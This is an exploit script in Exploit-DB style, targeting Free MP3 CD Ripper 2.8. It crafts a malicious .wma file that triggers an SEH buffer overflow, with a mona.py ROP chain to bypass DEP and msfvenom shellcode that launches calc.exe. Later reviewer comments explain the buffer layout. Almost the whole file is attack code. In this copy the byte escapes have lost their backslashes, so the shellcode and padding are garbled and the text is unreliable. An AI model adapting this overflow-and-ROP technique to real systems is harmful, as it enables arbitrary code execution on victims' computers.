# Exploit Title: Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-10-08
# Exploit Author: Matteo Malvica
# Vendor: Cleanersoft Software
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested Version: 2.8
# Tested on OS: Windows 7 - 64bit
# Modified from the SEH exploit at https://www.exploit-db.com/exploits/45412/
# CVE : N/A
#
# Steps:
# 0. Turn DEP on and reboot
# I Run the python script, it will create a new file with the name "exploit.wma".
# II Start the program and click on "Convert".
# III Load the file "exploit.wma"
# IV A shiny calculator will pop-up on your desktop

#!/usr/bin/python
import struct

# msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0dx2f' -f python
# Payload stage: msfvenom "windows/exec" launching calc.exe (the "shiny
# calculator" in the header steps).  0x00, 0x0a, 0x0d and 0x2f are declared
# bad characters -- presumably because NUL / CR / LF would cut or alter the
# copy into the vulnerable buffer, and 0x0a/0x0d would also be rewritten by
# the text-mode file write at the bottom of the script (confirm).
# NOTE(review): in this copy every "\xNN" escape (and the -b list above)
# appears to have lost its backslash, so as printed these are plain ASCII
# characters, not the encoded bytes; do not derive a detection signature
# from this text as-is.
shellcode = ""
shellcode += "xdbxdexd9x74x24xf4x58x2bxc9xb1x31xbaxef"
shellcode += "xc3xbdx59x83xc0x04x31x50x14x03x50xfbx21"
shellcode += "x48xa5xebx24xb3x56xebx48x3dxb3xdax48x59"
shellcode += "xb7x4cx79x29x95x60xf2x7fx0exf3x76xa8x21"
shellcode += "xb4x3dx8ex0cx45x6dxf2x0fxc5x6cx27xf0xf4"
shellcode += "xbex3axf1x31xa2xb7xa3xeaxa8x6ax54x9fxe5"
shellcode += "xb6xdfxd3xe8xbex3cxa3x0bxeex92xb8x55x30"
shellcode += "x14x6dxeex79x0ex72xcbx30xa5x40xa7xc2x6f"
shellcode += "x99x48x68x4ex16xbbx70x96x90x24x07xeexe3"
shellcode += "xd9x10x35x9ex05x94xaex38xcdx0ex0bxb9x02"
shellcode += "xc8xd8xb5xefx9ex87xd9xeex73xbcxe5x7bx72"
shellcode += "x13x6cx3fx51xb7x35x9bxf8xeex93x4ax04xf0"
shellcode += "x7cx32xa0x7ax90x27xd9x20xfexb6x6fx5fx4c"
shellcode += "xb8x6fx60xe0xd1x5exebx6fxa5x5ex3exd4x59"
shellcode += "x15x63x7cxf2xf0xf1x3dx9fx02x2cx01xa6x80"
shellcode += "xc5xf9x5dx98xafxfcx1ax1ex43x8cx33xcbx63"
shellcode += "x23x33xdex07xa2xa7x82xe9x41x40x20xf6"

def create_rop_chain():
    """Return the mona.py-generated ROP chain as a little-endian byte string.

    Every entry is emitted as one 32-bit '<I' value in list order, which is
    the order the gadgets are consumed from the stack.  Per the inline
    comments the chain fetches VirtualAlloc's address from the fcrip.exe
    IAT, loads its arguments into registers and fires the call via PUSHAD --
    the DEP bypass named in the header.  All gadget addresses are fixed
    (fcrip.exe 0x004xxxxx, libFLAC.dll 0x1000xxxx, vorbis.dll 0x639dxxxx),
    which presumably means those modules load without ASLR on the tested
    build; rebasing or randomising them would break the chain.
    """
    # rop chain generated with mona.py - www.corelan.be
    gadgets = (
        0x00487219,  # POP EDX # RETN [fcrip.exe]
        0x004e9208,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
        0x10007089,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [libFLAC.dll]
        0x0040508e,  # XCHG EAX,ESI # RETN [fcrip.exe]
        0x004d9e5c,  # POP EBP # RETN [fcrip.exe]
        0x1000c5ce,  # & push esp # ret [libFLAC.dll]
        0x00445aff,  # POP EBX # RETN [fcrip.exe]
        0x00000001,  # 0x00000001-> ebx
        0x00494012,  # POP EDX # RETN [fcrip.exe]
        0x00001000,  # 0x00001000-> edx
        0x004c2d76,  # POP ECX # RETN [fcrip.exe]
        0x00000040,  # 0x00000040-> ecx
        0x00409aa4,  # POP EDI # RETN [fcrip.exe]
        0x00412557,  # RETN (ROP NOP) [fcrip.exe]
        0x639d1575,  # POP EAX # RETN [vorbis.dll]
        0x90909090,  # nop
        0x00493619,  # PUSHAD # RETN [fcrip.exe]
    )
    # Accumulate one packed dword per gadget; the result is a str on the
    # Python 2 interpreter this script targets.
    chain = ''
    for dword in gadgets:
        chain += struct.pack('<I', dword)
    return chain

# --- Buffer layout ----------------------------------------------------------
# offset (3804 x 'A') | nop_block | rop_chain | nop_block*2 | shellcode |
# 4 marker bytes | SEH record | padding
# The ROP chain sits *before* the SEH record: the overwritten handler (see
# the SEH comment below) is a stack-pivot gadget (ADD ESP,45C ... RETN) that
# is presumably sized to land execution on the chain, which -- per its
# inline comments -- calls VirtualAlloc so the shellcode can run under DEP.
rop_chain = create_rop_chain()
# NOTE(review): as with the shellcode, the '\x' escapes appear to have lost
# their backslash in this copy ('x90' and 'xCC' are literal ASCII here).
nop_block = 'x90' * 8
total_buffer = 4444
offset = "A" * 3804
# Overwritten SEH handler.  The address is fixed and lives in vorbis.dll,
# which presumably means that module is loaded without ASLR and without a
# SafeSEH table on the tested build -- either protection (or SEHOP at the
# OS level) would stop this handler from being honoured; confirm against
# the module headers.
SEH = struct.pack('<L',0x639d2ad8) # 0x639d2ad8 # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] **
# Only SEH and offset are subtracted, so the final file is longer than
# total_buffer by the nop/rop/shellcode/marker bytes; the size printed when
# the file is written is the real length.
padding = "B" * (total_buffer - len(SEH) - len(offset))

payload = offset + nop_block + rop_chain + nop_block * 2 + shellcode + "xCC" * 4 + SEH + padding

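# Drop the crafted file; nothing is executed here -- the overflow only
# happens when the target application parses it (header steps II-IV).
# NOTE(review): "w" is text mode, so on Windows any 0x0a in the payload
# would be expanded to 0x0d 0x0a.  The msfvenom bad-char list excludes
# 0x0a/0x0d, which is presumably why this is tolerated; "wb" would not
# depend on that.
try:
    with open("exploit.wma", "w") as f:
        print("[+] Creating %s bytes of tiramisA1 payload..." % len(payload))
        f.write(payload)
    print("[+] High carb exploit created!")
except IOError as err:
    # Only a failed open/write is expected here.  The bare "except:" this
    # replaces also swallowed KeyboardInterrupt and NameError and hid the
    # reason, so the message now carries the error.
    print("Dessert cannot be created: %s" % err)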